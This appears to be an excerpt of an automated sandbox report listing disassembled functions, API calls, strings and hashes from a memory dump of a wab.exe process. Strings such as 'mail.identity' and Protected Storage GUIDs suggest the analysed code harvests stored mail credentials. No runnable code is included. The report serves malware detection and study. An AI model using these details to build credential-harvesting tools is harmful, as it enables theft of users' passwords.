                                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                      APIs
                                      Strings
                                      • too many SQL variables, xrefs: 0042C6FD
                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                      • API String ID: 2221118986-515162456
                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                      APIs
                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                      • memset.MSVCRT ref: 004026AD
                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                        • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                      • String ID:
                                      • API String ID: 1593657333-0
                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                      APIs
                                      • memset.MSVCRT ref: 0040C922
                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Message$MenuPostSendStringmemset
                                      • String ID:
                                      • API String ID: 3798638045-0
                                      • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                      • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                      APIs
                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                      • strlen.MSVCRT ref: 0040B60B
                                      • atoi.MSVCRT ref: 0040B619
                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                      • String ID:
                                      • API String ID: 4107816708-0
                                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                      • String ID:
                                      • API String ID: 1886415126-0
                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: >$>$>
                                      • API String ID: 39653677-3911187716
                                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @
                                      • API String ID: 3510742995-2766056989
                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                      APIs
                                      • strlen.MSVCRT ref: 0040797A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                        • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                        • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                      • memcpy.MSVCRT ref: 004079DD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocstrlen
                                      • String ID:
                                      • API String ID: 1171893557-0
                                      • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                      • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _strcmpi
                                      • String ID: C@$mail.identity
                                      • API String ID: 1439213657-721921413
                                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                      APIs
                                      • memset.MSVCRT ref: 00406640
                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                        • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                        • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                      • memcmp.MSVCRT ref: 00406672
                                      • memcpy.MSVCRT ref: 00406695
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset$memcmp
                                      • String ID: Ul@
                                      • API String ID: 270934217-715280498
                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                      APIs
                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                        • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                      • sprintf.MSVCRT ref: 0040B929
                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                      • sprintf.MSVCRT ref: 0040B953
                                      • _mbscat.MSVCRT ref: 0040B966
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                      • String ID:
                                      • API String ID: 203655857-0
                                      • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                      • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                      • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                      APIs
                                        • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                      Strings
                                      • recovered %d pages from %s, xrefs: 004188B4
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                      • String ID: recovered %d pages from %s
                                      • API String ID: 985450955-1623757624
                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _ultoasprintf
                                      • String ID: %s %s %s
                                      • API String ID: 432394123-3850900253
                                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                      APIs
                                      • memset.MSVCRT ref: 00409919
                                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSendmemset
                                      • String ID: N\@
                                      • API String ID: 568519121-3851889168
                                      • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                      • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                      • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                      • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                      APIs
                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                      • sprintf.MSVCRT ref: 0040909B
                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                      • String ID: menu_%d
                                      • API String ID: 1129539653-2417748251
                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                      APIs
                                      Strings
                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _msizerealloc
                                      • String ID: failed memory resize %u to %u bytes
                                      • API String ID: 2713192863-2134078882
                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                      APIs
                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                      • strrchr.MSVCRT ref: 00409808
                                      • _mbscat.MSVCRT ref: 0040981D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileModuleName_mbscatstrrchr
                                      • String ID: _lng.ini
                                      • API String ID: 3334749609-1948609170
                                      • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                      • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                      APIs
                                      • _mbscpy.MSVCRT ref: 004070EB
                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                      • _mbscat.MSVCRT ref: 004070FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscat$_mbscpystrlen
                                      • String ID: sqlite3.dll
                                      • API String ID: 1983510840-1155512374
                                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                      APIs
                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString
                                      • String ID: A4@$Server Details
                                      • API String ID: 1096422788-4071850762
                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FreeLocalmemcpymemsetstrlen
                                      • String ID:
                                      • API String ID: 3110682361-0
                                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID:
                                      • API String ID: 3510742995-0
                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                      • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14